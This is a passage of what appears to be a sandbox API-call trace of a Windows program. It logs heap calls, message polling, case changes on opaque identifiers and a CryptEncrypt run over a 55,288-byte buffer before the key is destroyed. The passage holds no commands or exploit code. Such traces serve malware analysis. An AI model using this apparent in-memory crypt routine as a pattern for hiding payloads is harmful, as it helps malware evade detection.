wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0190.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.614] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0190.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.615] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.615] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.615] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.615] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34cd250 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.620] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xd7f5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xd7f8) returned 1 [0190.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.620] CharLowerBuffW (in: lpsz="byte[55288]", cchLength=0xb | out: lpsz="byte[55288]") returned 0xb [0190.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.622] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.622] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.623] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.623] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.623] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.623] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34cd250*, pdwDataLen=0x8bef68*=0xd7f5, dwBufLen=0xd7f8 | out: pbData=0x34cd250*, pdwDataLen=0x8bef68*=0xd7f8) returned 1 [0190.624] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.624] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.624] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.624] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.625] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.625] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.625] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.626] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.626] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.626] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.626] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.626] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.626] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.626] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.626] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.626] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.626] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.633] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.633] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.633] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0190.633] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.633] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0190.633] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.633] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.633] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.633] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.633] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.633] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.633] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.634] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0190.634] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.634] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.634] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.634] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.634] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.634] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.634] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.634] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.634] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.634] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.635] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.635] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.635] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.635] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.635] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.635] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.635] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.635] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.636] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.636] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.636] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, 